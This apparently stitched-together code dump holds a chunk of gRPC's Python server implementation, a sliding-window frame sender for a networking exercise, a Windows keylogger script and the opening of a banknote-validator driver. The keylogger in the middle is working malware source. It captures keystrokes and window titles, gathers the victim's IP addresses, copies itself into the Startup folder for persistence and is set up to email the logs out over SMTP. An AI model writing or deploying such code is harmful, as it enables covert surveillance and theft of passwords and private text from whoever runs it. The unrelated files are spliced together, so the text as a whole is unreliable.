    def __next__(self):
        return self._next()

    def next(self):
        # Python 2 iteration protocol alias.
        return self._next()
def _unary_request(rpc_event, state, request_deserializer):
    """Build a thunk producing the single request of a unary-request RPC.

    The thunk returns None when the RPC terminates first, when the client
    cancels, or when the client half-closes without sending a message (in
    which case the RPC is aborted with UNIMPLEMENTED).
    """

    def unary_request():
        with state.condition:
            if not _is_rpc_state_active(state):
                return None
            else:
                rpc_event.call.start_server_batch(
                    (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
                    _receive_message(state, rpc_event.call,
                                     request_deserializer))
                state.due.add(_RECEIVE_MESSAGE_TOKEN)
                while True:
                    # Woken by the receive-message / close callbacks.
                    state.condition.wait()
                    if state.request is None:
                        if state.client is _CLOSED:
                            details = '"{}" requires exactly one request message.'.format(
                                rpc_event.call_details.method)
                            _abort(state, rpc_event.call,
                                   cygrpc.StatusCode.unimplemented,
                                   _common.encode(details))
                            return None
                        elif state.client is _CANCELLED:
                            return None
                    else:
                        request = state.request
                        state.request = None
                        return request

    return unary_request
def _call_behavior(rpc_event,
                   state,
                   behavior,
                   argument,
                   request_deserializer,
                   send_response_callback=None):
    """Invoke the application *behavior*; return (result, proceed).

    Exceptions raised by the application abort the RPC with UNKNOWN, except
    for RpcErrors this module itself raised into the handler (tracked in
    state.rpc_errors) and for aborts already requested via context.abort().
    """
    # Imported here rather than at module level to avoid a circular import.
    from grpc import _create_servicer_context
    with _create_servicer_context(rpc_event, state,
                                  request_deserializer) as context:
        try:
            if send_response_callback is not None:
                return behavior(argument, context, send_response_callback), True
            else:
                return behavior(argument, context), True
        except Exception as exception:  # pylint: disable=broad-except
            with state.condition:
                if state.aborted:
                    _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                           b'RPC Aborted')
                elif exception not in state.rpc_errors:
                    details = 'Exception calling application: {}'.format(
                        exception)
                    _LOGGER.exception(details)
                    _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                           _common.encode(details))
            return None, False
def _take_response_from_response_iterator(rpc_event, state, response_iterator):
    """Pull one response from the handler's iterator; return (response, proceed).

    StopIteration maps to (None, True), marking normal end of the stream;
    other exceptions abort the RPC (unless already aborted or raised by this
    module) and map to (None, False).
    """
    try:
        return next(response_iterator), True
    except StopIteration:
        return None, True
    except Exception as exception:  # pylint: disable=broad-except
        with state.condition:
            if state.aborted:
                _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                       b'RPC Aborted')
            elif exception not in state.rpc_errors:
                details = 'Exception iterating responses: {}'.format(exception)
                _LOGGER.exception(details)
                _abort(state, rpc_event.call, cygrpc.StatusCode.unknown,
                       _common.encode(details))
        return None, False
def _serialize_response(rpc_event, state, response, response_serializer):
    """Serialize *response*; abort the RPC with INTERNAL and return None on failure."""
    serialized_response = _common.serialize(response, response_serializer)
    if serialized_response is not None:
        return serialized_response
    with state.condition:
        _abort(state, rpc_event.call, cygrpc.StatusCode.internal,
               b'Failed to serialize response!')
    return None
def _send_response(rpc_event, state, serialized_response):
    """Send one serialized response message, blocking until delivered.

    Returns False without sending when the RPC is no longer active; otherwise
    returns whether the RPC is still active after the send completes. Initial
    metadata is bundled into the same batch when it has not yet been sent.
    """
    with state.condition:
        if not _is_rpc_state_active(state):
            return False
        else:
            if state.initial_metadata_allowed:
                operations = (
                    cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
                    cygrpc.SendMessageOperation(serialized_response,
                                                _EMPTY_FLAGS),
                )
                state.initial_metadata_allowed = False
                token = _SEND_INITIAL_METADATA_AND_SEND_MESSAGE_TOKEN
            else:
                operations = (cygrpc.SendMessageOperation(
                    serialized_response, _EMPTY_FLAGS),)
                token = _SEND_MESSAGE_TOKEN
            rpc_event.call.start_server_batch(operations,
                                              _send_message(state, token))
            state.due.add(token)
            # Block until _send_message's completion callback retires the token.
            while True:
                state.condition.wait()
                if token not in state.due:
                    return _is_rpc_state_active(state)
def _status(rpc_event, state, serialized_response):
    """Send the RPC's terminating status (plus an optional final response).

    No-op when the client already cancelled. Initial metadata and a final
    message are folded into the same batch when applicable.
    """
    with state.condition:
        if state.client is not _CANCELLED:
            code = _completion_code(state)
            details = _details(state)
            operations = [
                cygrpc.SendStatusFromServerOperation(
                    state.trailing_metadata, code, details, _EMPTY_FLAGS),
            ]
            if state.initial_metadata_allowed:
                operations.append(
                    cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS))
            if serialized_response is not None:
                operations.append(
                    cygrpc.SendMessageOperation(serialized_response,
                                                _EMPTY_FLAGS))
            rpc_event.call.start_server_batch(
                operations,
                _send_status_from_server(state, _SEND_STATUS_FROM_SERVER_TOKEN))
            state.statused = True
            state.due.add(_SEND_STATUS_FROM_SERVER_TOKEN)
def _unary_response_in_pool(rpc_event, state, behavior, argument_thunk,
                            request_deserializer, response_serializer):
    """Thread-pool entry point for RPCs with a unary response."""
    # Make the call's context current for the duration of the handler.
    cygrpc.install_context_from_request_call_event(rpc_event)
    try:
        argument = argument_thunk()
        if argument is not None:
            response, proceed = _call_behavior(rpc_event, state, behavior,
                                               argument, request_deserializer)
            if proceed:
                serialized_response = _serialize_response(
                    rpc_event, state, response, response_serializer)
                if serialized_response is not None:
                    _status(rpc_event, state, serialized_response)
    finally:
        cygrpc.uninstall_context()
def _stream_response_in_pool(rpc_event, state, behavior, argument_thunk,
                             request_deserializer, response_serializer):
    """Thread-pool entry point for RPCs with a streaming response."""
    cygrpc.install_context_from_request_call_event(rpc_event)

    def send_response(response):
        # None signals end-of-stream: send the terminating status instead.
        if response is None:
            _status(rpc_event, state, None)
        else:
            serialized_response = _serialize_response(
                rpc_event, state, response, response_serializer)
            if serialized_response is not None:
                _send_response(rpc_event, state, serialized_response)

    try:
        argument = argument_thunk()
        if argument is not None:
            # Experimental non-blocking handlers push responses through the
            # callback themselves; blocking handlers return an iterator that
            # is drained below.
            if hasattr(behavior, 'experimental_non_blocking'
                      ) and behavior.experimental_non_blocking:
                _call_behavior(
                    rpc_event,
                    state,
                    behavior,
                    argument,
                    request_deserializer,
                    send_response_callback=send_response)
            else:
                response_iterator, proceed = _call_behavior(
                    rpc_event, state, behavior, argument, request_deserializer)
                if proceed:
                    _send_message_callback_to_blocking_iterator_adapter(
                        rpc_event, state, send_response, response_iterator)
    finally:
        cygrpc.uninstall_context()
def _is_rpc_state_active(state):
    """An RPC is active until the client cancels it or a status is sent."""
    if state.client is _CANCELLED:
        return False
    return not state.statused
def _send_message_callback_to_blocking_iterator_adapter(
        rpc_event, state, send_response_callback, response_iterator):
    """Drain a blocking response iterator through the send callback.

    Stops when the iterator is exhausted (send_response_callback(None) then
    sends the status), when taking a response fails, or when the RPC becomes
    inactive.
    """
    while True:
        response, proceed = _take_response_from_response_iterator(
            rpc_event, state, response_iterator)
        if proceed:
            send_response_callback(response)
            if not _is_rpc_state_active(state):
                break
        else:
            break
def _select_thread_pool_for_behavior(behavior, default_thread_pool):
    """Prefer the handler's experimental per-method thread pool when provided."""
    experimental_pool = getattr(behavior, 'experimental_thread_pool', None)
    if isinstance(experimental_pool, futures.ThreadPoolExecutor):
        return experimental_pool
    return default_thread_pool
def _handle_unary_unary(rpc_event, state, method_handler, default_thread_pool):
    """Submit a unary-request/unary-response RPC to the appropriate pool."""
    behavior = method_handler.unary_unary
    argument_thunk = _unary_request(rpc_event, state,
                                    method_handler.request_deserializer)
    pool = _select_thread_pool_for_behavior(behavior, default_thread_pool)
    return pool.submit(_unary_response_in_pool, rpc_event, state, behavior,
                       argument_thunk, method_handler.request_deserializer,
                       method_handler.response_serializer)
def _handle_unary_stream(rpc_event, state, method_handler, default_thread_pool):
    """Submit a unary-request/stream-response RPC to the appropriate pool."""
    behavior = method_handler.unary_stream
    argument_thunk = _unary_request(rpc_event, state,
                                    method_handler.request_deserializer)
    pool = _select_thread_pool_for_behavior(behavior, default_thread_pool)
    return pool.submit(_stream_response_in_pool, rpc_event, state, behavior,
                       argument_thunk, method_handler.request_deserializer,
                       method_handler.response_serializer)
def _handle_stream_unary(rpc_event, state, method_handler, default_thread_pool):
    """Submit a stream-request/unary-response RPC to the appropriate pool."""
    behavior = method_handler.stream_unary
    request_iterator = _RequestIterator(state, rpc_event.call,
                                        method_handler.request_deserializer)
    pool = _select_thread_pool_for_behavior(behavior, default_thread_pool)
    return pool.submit(_unary_response_in_pool, rpc_event, state, behavior,
                       lambda: request_iterator,
                       method_handler.request_deserializer,
                       method_handler.response_serializer)
def _handle_stream_stream(rpc_event, state, method_handler,
                          default_thread_pool):
    """Submit a stream-request/stream-response RPC to the appropriate pool."""
    behavior = method_handler.stream_stream
    request_iterator = _RequestIterator(state, rpc_event.call,
                                        method_handler.request_deserializer)
    pool = _select_thread_pool_for_behavior(behavior, default_thread_pool)
    return pool.submit(_stream_response_in_pool, rpc_event, state, behavior,
                       lambda: request_iterator,
                       method_handler.request_deserializer,
                       method_handler.response_serializer)
def _find_method_handler(rpc_event, generic_handlers, interceptor_pipeline):
    """Locate the method handler for this call, via interceptors when configured."""

    def query_handlers(handler_call_details):
        # First generic handler that services the method wins.
        for generic_handler in generic_handlers:
            handler = generic_handler.service(handler_call_details)
            if handler is not None:
                return handler
        return None

    handler_call_details = _HandlerCallDetails(
        _common.decode(rpc_event.call_details.method),
        rpc_event.invocation_metadata)

    if interceptor_pipeline is None:
        return query_handlers(handler_call_details)
    return interceptor_pipeline.execute(query_handlers, handler_call_details)
def _reject_rpc(rpc_event, status, details):
    """Immediately terminate a just-arrived call with *status*/*details*."""
    operations = (
        cygrpc.SendInitialMetadataOperation(None, _EMPTY_FLAGS),
        cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),
        cygrpc.SendStatusFromServerOperation(None, status, details,
                                             _EMPTY_FLAGS),
    )
    rpc_state = _RPCState()
    # The completion callback yields (rpc_state, no callbacks) so the driver
    # loop can retire the state when the batch completes.
    rpc_event.call.start_server_batch(operations,
                                      lambda ignored_event: (rpc_state, (),))
    return rpc_state
def _handle_with_method_handler(rpc_event, method_handler, thread_pool):
    """Start servicing a call with *method_handler*; return (state, future).

    Always begins a receive-close batch (to learn about cancellation), then
    dispatches to the handler variant matching the method's streaming shape.
    """
    state = _RPCState()
    with state.condition:
        rpc_event.call.start_server_batch(
            (cygrpc.ReceiveCloseOnServerOperation(_EMPTY_FLAGS),),
            _receive_close_on_server(state))
        state.due.add(_RECEIVE_CLOSE_ON_SERVER_TOKEN)
        if method_handler.request_streaming:
            if method_handler.response_streaming:
                return state, _handle_stream_stream(rpc_event, state,
                                                    method_handler, thread_pool)
            else:
                return state, _handle_stream_unary(rpc_event, state,
                                                   method_handler, thread_pool)
        else:
            if method_handler.response_streaming:
                return state, _handle_unary_stream(rpc_event, state,
                                                   method_handler, thread_pool)
            else:
                return state, _handle_unary_unary(rpc_event, state,
                                                  method_handler, thread_pool)
def _handle_call(rpc_event, generic_handlers, interceptor_pipeline, thread_pool,
                 concurrency_exceeded):
    """Dispatch a newly arrived call; return (rpc_state, rpc_future).

    Either element may be None: (None, None) for failed or method-less
    events, (state, None) for rejected calls, (state, future) for calls
    actually handed to a handler thread.
    """
    if not rpc_event.success:
        return None, None
    if rpc_event.call_details.method is not None:
        try:
            method_handler = _find_method_handler(rpc_event, generic_handlers,
                                                  interceptor_pipeline)
        except Exception as exception:  # pylint: disable=broad-except
            details = 'Exception servicing handler: {}'.format(exception)
            _LOGGER.exception(details)
            return _reject_rpc(rpc_event, cygrpc.StatusCode.unknown,
                               b'Error in service handler!'), None
        if method_handler is None:
            return _reject_rpc(rpc_event, cygrpc.StatusCode.unimplemented,
                               b'Method not found!'), None
        elif concurrency_exceeded:
            return _reject_rpc(rpc_event, cygrpc.StatusCode.resource_exhausted,
                               b'Concurrent RPC limit exceeded!'), None
        else:
            return _handle_with_method_handler(rpc_event, method_handler,
                                               thread_pool)
    else:
        return None, None
@enum.unique
class _ServerStage(enum.Enum):
    """Server lifecycle stage: STOPPED -> STARTED -> GRACE -> STOPPED."""
    STOPPED = 'stopped'
    STARTED = 'started'
    GRACE = 'grace'
class _ServerState(object):
    """All mutable server-wide state, guarded by ``lock``."""

    # pylint: disable=too-many-arguments
    def __init__(self, completion_queue, server, generic_handlers,
                 interceptor_pipeline, thread_pool, maximum_concurrent_rpcs):
        self.lock = threading.RLock()
        self.completion_queue = completion_queue
        self.server = server
        self.generic_handlers = list(generic_handlers)
        self.interceptor_pipeline = interceptor_pipeline
        self.thread_pool = thread_pool
        self.stage = _ServerStage.STOPPED
        # List of threading.Events once shutdown has begun; None before that.
        self.shutdown_events = None
        self.maximum_concurrent_rpcs = maximum_concurrent_rpcs
        self.active_rpc_count = 0

        # TODO(https://github.com/grpc/grpc/issues/6597): eliminate these fields.
        self.rpc_states = set()
        self.due = set()

        # A "volatile" flag to interrupt the daemon serving thread
        self.server_deallocated = False
def _add_generic_handlers(state, generic_handlers):
    """Register additional generic handlers under the server lock."""
    with state.lock:
        state.generic_handlers.extend(generic_handlers)
def _add_insecure_port(state, address):
    """Bind *address* without credentials; returns the bound port number."""
    with state.lock:
        return state.server.add_http2_port(address)
def _add_secure_port(state, address, server_credentials):
    """Bind *address* with the given credentials; returns the bound port number."""
    with state.lock:
        return state.server.add_http2_port(address,
                                           server_credentials._credentials)
def _request_call(state):
    """Ask the core for the next incoming call, tagged for the driver loop."""
    state.server.request_call(state.completion_queue, state.completion_queue,
                              _REQUEST_CALL_TAG)
    state.due.add(_REQUEST_CALL_TAG)
# TODO(https://github.com/grpc/grpc/issues/6597): delete this function.
def _stop_serving(state):
    """Destroy the server once nothing is outstanding; True if it stopped."""
    if not state.rpc_states and not state.due:
        state.server.destroy()
        # Release every waiter blocked in _stop().
        for shutdown_event in state.shutdown_events:
            shutdown_event.set()
        state.stage = _ServerStage.STOPPED
        return True
    else:
        return False
def _on_call_completed(state):
    """Done-callback for RPC futures: release one concurrency slot."""
    with state.lock:
        state.active_rpc_count -= 1
def _process_event_and_continue(state, event):
    """Handle one completion-queue event; False means stop the serving loop."""
    should_continue = True
    if event.tag is _SHUTDOWN_TAG:
        with state.lock:
            state.due.remove(_SHUTDOWN_TAG)
            if _stop_serving(state):
                should_continue = False
    elif event.tag is _REQUEST_CALL_TAG:
        with state.lock:
            state.due.remove(_REQUEST_CALL_TAG)
            concurrency_exceeded = (
                state.maximum_concurrent_rpcs is not None and
                state.active_rpc_count >= state.maximum_concurrent_rpcs)
            rpc_state, rpc_future = _handle_call(
                event, state.generic_handlers, state.interceptor_pipeline,
                state.thread_pool, concurrency_exceeded)
            if rpc_state is not None:
                state.rpc_states.add(rpc_state)
            if rpc_future is not None:
                state.active_rpc_count += 1
                rpc_future.add_done_callback(
                    lambda unused_future: _on_call_completed(state))
            if state.stage is _ServerStage.STARTED:
                # Keep exactly one request_call outstanding while serving.
                _request_call(state)
            elif _stop_serving(state):
                should_continue = False
    else:
        # Per-RPC batch completion: the tag IS the operation's completion
        # callback; it returns (terminated rpc_state or None, callbacks).
        rpc_state, callbacks = event.tag(event)
        for callback in callbacks:
            try:
                callback()
            except Exception:  # pylint: disable=broad-except
                _LOGGER.exception('Exception calling callback!')
        if rpc_state is not None:
            with state.lock:
                state.rpc_states.remove(rpc_state)
                if _stop_serving(state):
                    should_continue = False
    return should_continue
def _serve(state):
    """Daemon serving loop: poll the completion queue and dispatch events."""
    while True:
        # Bounded poll so the server_deallocated flag is checked periodically.
        timeout = time.time() + _DEALLOCATED_SERVER_CHECK_PERIOD_S
        event = state.completion_queue.poll(timeout)
        if state.server_deallocated:
            _begin_shutdown_once(state)
        if event.completion_type != cygrpc.CompletionType.queue_timeout:
            if not _process_event_and_continue(state, event):
                return
        # We want to force the deletion of the previous event
        # ~before~ we poll again; if the event has a reference
        # to a shutdown Call object, this can induce spinlock.
        event = None
def _begin_shutdown_once(state):
    """Move a STARTED server into GRACE; idempotent under the lock."""
    with state.lock:
        if state.stage is _ServerStage.STARTED:
            state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
            state.stage = _ServerStage.GRACE
            state.shutdown_events = []
            state.due.add(_SHUTDOWN_TAG)
def _stop(state, grace):
    """Begin shutdown; return an Event that is set once the server stops.

    With grace=None all in-flight calls are cancelled immediately and this
    call blocks until shutdown completes. Otherwise a helper thread cancels
    whatever remains after *grace* seconds (unless shutdown finished first
    and set the event) and the unset event is returned immediately.
    """
    with state.lock:
        if state.stage is _ServerStage.STOPPED:
            # Already stopped: hand back an already-set event.
            shutdown_event = threading.Event()
            shutdown_event.set()
            return shutdown_event
        else:
            _begin_shutdown_once(state)
            shutdown_event = threading.Event()
            state.shutdown_events.append(shutdown_event)
            if grace is None:
                state.server.cancel_all_calls()
            else:

                def cancel_all_calls_after_grace():
                    shutdown_event.wait(timeout=grace)
                    with state.lock:
                        state.server.cancel_all_calls()

                thread = threading.Thread(target=cancel_all_calls_after_grace)
                thread.start()
                return shutdown_event
    # Reached only when grace is None: block until shutdown completes.
    shutdown_event.wait()
    return shutdown_event
def _start(state):
    """Start the core server and spawn the daemon serving thread."""
    with state.lock:
        if state.stage is not _ServerStage.STOPPED:
            raise ValueError('Cannot start already-started server!')
        state.server.start()
        state.stage = _ServerStage.STARTED
        _request_call(state)

        thread = threading.Thread(target=_serve, args=(state,))
        # Daemonized so a still-running server does not keep the process alive.
        thread.daemon = True
        thread.start()
def _validate_generic_rpc_handlers(generic_rpc_handlers):
    """Raise AttributeError for any handler lacking a ``service`` attribute."""
    for handler in generic_rpc_handlers:
        if getattr(handler, 'service', None) is None:
            raise AttributeError(
                '"{}" must conform to grpc.GenericRpcHandler type but does '
                'not have "service" method!'.format(handler))
class _Server(grpc.Server):
    """Public grpc.Server implementation: a thin facade over _ServerState."""

    # pylint: disable=too-many-arguments
    def __init__(self, thread_pool, generic_handlers, interceptors, options,
                 maximum_concurrent_rpcs):
        completion_queue = cygrpc.CompletionQueue()
        server = cygrpc.Server(options)
        server.register_completion_queue(completion_queue)
        self._state = _ServerState(completion_queue, server, generic_handlers,
                                   _interceptor.service_pipeline(interceptors),
                                   thread_pool, maximum_concurrent_rpcs)

    def add_generic_rpc_handlers(self, generic_rpc_handlers):
        _validate_generic_rpc_handlers(generic_rpc_handlers)
        _add_generic_handlers(self._state, generic_rpc_handlers)

    def add_insecure_port(self, address):
        return _add_insecure_port(self._state, _common.encode(address))

    def add_secure_port(self, address, server_credentials):
        return _add_secure_port(self._state, _common.encode(address),
                                server_credentials)

    def start(self):
        _start(self._state)

    def stop(self, grace):
        return _stop(self._state, grace)

    def __del__(self):
        if hasattr(self, '_state'):
            # We can not grab a lock in __del__(), so set a flag to signal the
            # serving daemon thread (if it exists) to initiate shutdown.
            self._state.server_deallocated = True
def create_server(thread_pool, generic_rpc_handlers, interceptors, options,
                  maximum_concurrent_rpcs):
    """Validate the handlers, then construct and return a _Server."""
    _validate_generic_rpc_handlers(generic_rpc_handlers)
    server = _Server(thread_pool, generic_rpc_handlers, interceptors, options,
                     maximum_concurrent_rpcs)
    return server
|
sender.py | import time
import threading
from frameHelper import Frame
import logger
# Maximum number of unacknowledged frames allowed in flight (sliding window).
MAX_WINDOW_SIZE = 7
# Retransmission time-out in seconds.
# NOTE(review): a module constant — consider UPPER_SNAKE_CASE naming (TIMEOUT).
timeout=2
# Round-trip times of all acknowledged frames, for end-of-run statistics.
# NOTE(review): module-level mutable state — shared across Sender instances.
rttList = []
class Sender:
def __init__(self, connection, name:str, senderAddress:int, receiverName:str, receiverAddress:int ,fileName:str):
# get the client/receiver connection and other informations (name, data file name)
self.connection = connection
self.name = name
self.receiver = receiverName
self.fileName = fileName
self.senderAddress = senderAddress
self.receiverAddress = receiverAddress
# some transmission control variables and flags
self.frameType = {'data' : 0, 'ack' : 1}
self.eot = False
self.front = 0
self.end = 0
self.window_size = 0
self.frameCount = 0
self.totalFrameCount = 0
self.current_window = [0 for i in range(0,8)]
self.frame_timer = [0 for i in range(0,8)]
self.lock = threading.Lock()
def isValidACK (self, ack_no:int):
"""Function to check if the acknowledgement number lies within window"""
# if Ack is valid, return true
if((self.front<ack_no and ack_no<=self.end) or (self.end<self.front and self.front<ack_no) or (ack_no<=self.end and self.end<self.front)):
return True
# if Ack number lies outside range, return false
else:
return False
def resendFrames (self):
"""Function to handle frame resending"""
time.sleep(0.2)
# loop until end of transmission
while (not self.eot) or (self.window_size>0):
# if any frames were sent
if(self.window_size>0):
current_time = time.time()
front_waiting_time = current_time - self.frame_timer[self.front]
# if time-out occurs and there is a valid outstanding window
# resend all the frames in the window again and restart timer
if(front_waiting_time > timeout):
self.lock.acquire()
temp = self.front
while (temp != self.end):
# resend the frame
self.connection.send(str.encode(self.current_window[temp].frame))
print("STATUS: FRAME",temp,"RESENT")
# restart the timer
self.frame_timer[temp] = time.time()
# move to the next frame
temp = (temp+1)%(MAX_WINDOW_SIZE+1)
# increment no of frames sent
self.totalFrameCount += 1
self.lock.release()
def sendFrames(self):
"""Function to handle data sending"""
time.sleep(0.2)
# open data file for reading
file = open(self.fileName,'r')
# read data from file
data = file.read(46)
# loop until whole data is sent
while data:
# if window is not full, send another frame
if (self.window_size<MAX_WINDOW_SIZE):
# build frame using data, type and sequence number
frame = Frame(self.senderAddress, self.receiverAddress, self.frameType['data'], self.end, data)
# store current frame for re-transmission (if needed)
self.current_window[self.end] = frame
# acquire window write lock
self.lock.acquire()
# Send the frame
self.connection.send(str.encode(frame.toBinaryString(46)))
print("\nSTATUS: FRAME",self.end,"SENT TO CHANNEL")
self.frame_timer[self.end] = time.time()
# update end, window size and other parameters accordingly
self.end = (self.end+1)%(MAX_WINDOW_SIZE+1)
self.window_size += 1
self.frameCount += 1
self.totalFrameCount += 1
# Read next data frame
data = file.read(46)
# release window write lock
self.lock.release()
# If all data has been read, break
if len(data) == 0: break
# Set the end-transmitting flag True
self.eot = True
# Close the data file
file.close()
def receiveAck(self):
"""Function to handle acknowledgement receiving"""
time.sleep(0.2)
# loop until end of transmission
while (not self.eot) or (self.window_size>0):
# if any frames were sent
if(self.window_size>0):
# wait and receive acknowledgement and build frame from that
received = self.connection.recv(384).decode()
frame=Frame.build(received)
else: continue
# if frame type is acknowledgement
if frame.getType() == 1:
# if frame has no error
if(frame.hasError()==False):
if self.isValidACK(frame.seqNo):
# Acquire lock for accessing window
self.lock.acquire()
# update the window front and window size according to the ackNo
while(self.front!=frame.seqNo):
roundTripTime = time.time() - self.frame_timer[self.front]
rttList.append(roundTripTime)
print("STATUS: FRAME",self.front,"HAS REACHED SUCCESSFULLY\n")
self.front = (self.front+1)%(MAX_WINDOW_SIZE+1)
self.window_size -= 1
# Release window access lock
self.lock.release()
else:
print("STATUS: WRONG ACK")
else:
print("STATUS: ERRONEOUS ACK")
else:
print("STATUS: RECEIVED FRAME IS NOT AN ACK")
    def transmit(self):
        """Run one full transmission session.

        Waits for the channel's start signal, spawns the sender, ACK-receiver
        and retransmission threads, waits for all three to finish, then
        notifies the channel and (on the following line) stores statistics.
        """
        # Receive 'start' signal from channel for synchronization
        inp=self.connection.recv(1024)
        # mark the start of sending
        print("\nSender: "+self.name+" --------------- Receiver: "+self.receiver+"\n")
        # record the starting time (used for the session statistics)
        startTime=time.time()
        # create a thread to handle data sending
        sendThread = threading.Thread(name="sendThread", target=self.sendFrames)
        # create another thread to handle acknowledgement receiving
        receiveAckThread = threading.Thread(name="receiveAckThread", target=self.receiveAck)
        # create frame resending (timeout/retransmit) thread
        resendThread = threading.Thread(name="resendThread",target=self.resendFrames)
        # start all three threads
        sendThread.start()
        receiveAckThread.start()
        resendThread.start()
        # wait for the threads to join (end their task)
        sendThread.join()
        receiveAckThread.join()
        resendThread.join()
        # notify channel about the end of transmission
        self.connection.send(str.encode("end"))
        totalTime = time.time() - startTime
logger.storeLogs(self.name, self.receiver, self.frameCount, self.totalFrameCount, totalTime, rttList) |
Python advanced keylogger.py | #//python keylogging program
## You will need to comment out the prints and exception prints on code if you were to use this for real, as its testing
## i have prints on here that will tell you and let you know what part of the program is going at the time and that it is
## working
# Surport me and subscribe to my YouTube tutorial channel - https://bit.ly/2U58Lt9 / link also in my description. Thanks.
#imports
from pynput.keyboard import Key,Listener
import win32gui
import os
import time
import requests
import socket
import random
import smtplib
from os import getcwd
from shutil import copy
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import threading
import config
datetime = time.ctime(time.time())
user = os.path.expanduser('~').split('\\')[2]
publicIP = requests.get('https://api.ipify.org/').text
privateIP = socket.gethostbyname(socket.gethostname())
file_name = "\Python advanced keylogger.py"
try:
copy(getcwd()+ file_name,'C:/Users/'+ user +'/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup')
print("Copy Success")
except Exception as copyException:
print("Copy error: %s" % (copyException))
pass
msg = f'[START OF LOGS]\n *~ Date/Time: {datetime}\n *~ User-Profile: {user}\n *~ Public-IP: {publicIP}\n *~ Private-IP: {privateIP}\n\n'
logged_data = []
logged_data.append(msg)
old_app = ''
delete_file = []
if not os.path.exists("C:/sys_logs"):
os.mkdir("C:/sys_logs")
print("Monitering")
def on_press(key):
global old_app
new_app = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if new_app == 'Cortana':
new_app = 'Windows Start Menu'
else:
pass
if new_app != old_app and new_app != '':
try:
logged_data.append(f'\n[{datetime}] ~ {new_app}\n')
old_app = new_app
except Exception as appendExcetion:
print("Apend Error: %s" % (appendExcetion))
old_app = new_app
else:
pass
substitution = ['Key.enter', '[ENTER]\n', 'Key.backspace', '[BACKSPACE]', 'Key.space', ' ',
'Key.alt_l', '[ALT]', 'Key.tab', '[TAB]', 'Key.delete', '[DEL]', 'Key.ctrl_l', '[CTRL]',
'Key.left', '[LEFT ARROW]', 'Key.right', '[RIGHT ARROW]', 'Key.shift', '[SHIFT]', '\\x13',
'[CTRL-S]', '\\x17', '[CTRL-W]', 'Key.caps_lock', '[CAPS LK]', '\\x01', '[CTRL-A]', 'Key.cmd',
'[WINDOWS KEY]', 'Key.print_screen', '[PRNT SCR]', '\\x03', '[CTRL-C]', '\\x16', '[CTRL-V]']
key = str(key).strip('\'')
if key in substitution:
logged_data.append(substitution[substitution.index(key)+1])
else:
logged_data.append(key)
def write_file(count):
one = os.path.expanduser('~') + '/Downloads/'
two = os.path.expanduser('~') + '/Pictures/'
three = 'C:/sys_logs/'
list = [three]
filepath = random.choice(list)
filename = str(count) + 'I' + str(random.randint(1000000,9999999)) + '.txt'
file = filepath + filename
delete_file.append(file)
try:
with open(file,'w', encoding = "utf-8") as fp:
fp.write(''.join(logged_data))
print('written all good')
except Exception as writeException:
print("Write Error: %s" % (writeException))
def send_logs():
count = 0
fromAddr = config.fromAddr
fromPswd = config.fromPswd
toAddr = fromAddr
MIN = 10
SECONDS = 60
#time.sleep(MIN * SECONDS) # every 10 mins write file/send log
# for debugging ~ yes program works :)
while True:
time.sleep(10)
if len(logged_data) > 1:
try:
write_file(count)
subject = f'[{user}] ~ {count}'
msg = MIMEMultipart()
msg['From'] = fromAddr
msg['To'] = toAddr
msg['Subject'] = subject
body = 'testing'
msg.attach(MIMEText(body,'plain'))
attachment = open(delete_file[0],'rb')
print('attachment')
filename = delete_file[0].split('/')[2]
part = MIMEBase('application','octect-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('content-disposition','attachment;filename='+str(filename))
msg.attach(part)
text = msg.as_string()
print('test msg.as_string')
s = smtplib.SMTP('smtp.gmail.com',587)
s.ehlo()
s.starttls()
print('starttls')
# s.ehlo()
# s.login(fromAddr,fromPswd)
# s.sendmail(fromAddr,toAddr,text)
print('sent mail')
attachment.close()
s.close()
#os.remove(delete_file[0])
del logged_data[1:]
del delete_file[0:]
print('delete data/files')
count += 1
except Exception as errorString:
print('[!] send_logs // Error.. ~ %s' % (errorString))
pass
if __name__=='__main__':
T1 = threading.Thread(target=send_logs)
T1.start()
with Listener(on_press=on_press) as listener:
listener.join()
|
eSSP.py | # !/usr/bin/env python3
import threading
from ctypes import *
from time import sleep
from six.moves import queue
from .constants import Status, FailureStatus, Actions
class Ssp6ChannelData(Structure):
    """ctypes mirror of the SSP6 per-channel record: security flag, channel
    value, and a currency code (3 chars + NUL, presumably -- confirm against
    the C header)."""
    _fields_ = [("security", c_ubyte),
                ("value", c_uint),
                ("cc", c_char * 4)]
class Ssp6SetupRequestData(Structure):
    """ctypes mirror of the SSP6 setup-request reply: unit type, firmware
    string, and up to 20 channel records."""
    _fields_ = [("UnitType", c_ubyte),
                ("FirmwareVersion", c_char * 5),
                ("NumberOfChannels", c_uint),
                ("ChannelData", Ssp6ChannelData * 20),
                ("RealValueMultiplier", c_ulong),
                ("ProtocolVersion", c_ubyte)]
class SspPollEvent6(Structure):
    """ctypes mirror of one SSP6 poll event (event code, two data words,
    currency code)."""
    _fields_ = [("event", c_ubyte),
                ("data1", c_ulong),
                ("data2", c_ulong),
                ("cc", c_char * 4)]
class SspPollData6(Structure):
    """ctypes mirror of an SSP6 poll reply: fixed array of 20 events plus the
    count of valid entries."""
    _fields_ = [("events", SspPollEvent6 * 20),
                ("event_count", c_ubyte)]
class eSSP(object):
"""Encrypted Smiley Secure Protocol Class"""
def __init__(self, com_port, ssp_address="0", nv11=False, debug=False):
self.debug = debug
self.nv11 = nv11
self.actions = queue.Queue()
self.actions_args = {}
self.response_data = {}
self.events = []
# There can't be 9999 notes in the storage
self.response_data['getnoteamount_response'] = 9999
self.sspC = self.essp.ssp_init(
com_port.encode(), ssp_address.encode(), debug)
self.poll = SspPollData6()
setup_req = Ssp6SetupRequestData()
# Check if the validator is present
if self.essp.ssp6_sync(self.sspC) != Status.SSP_RESPONSE_OK.value:
self.print_debug("NO VALIDATOR FOUND")
self.close()
raise Exception("No validator found")
else:
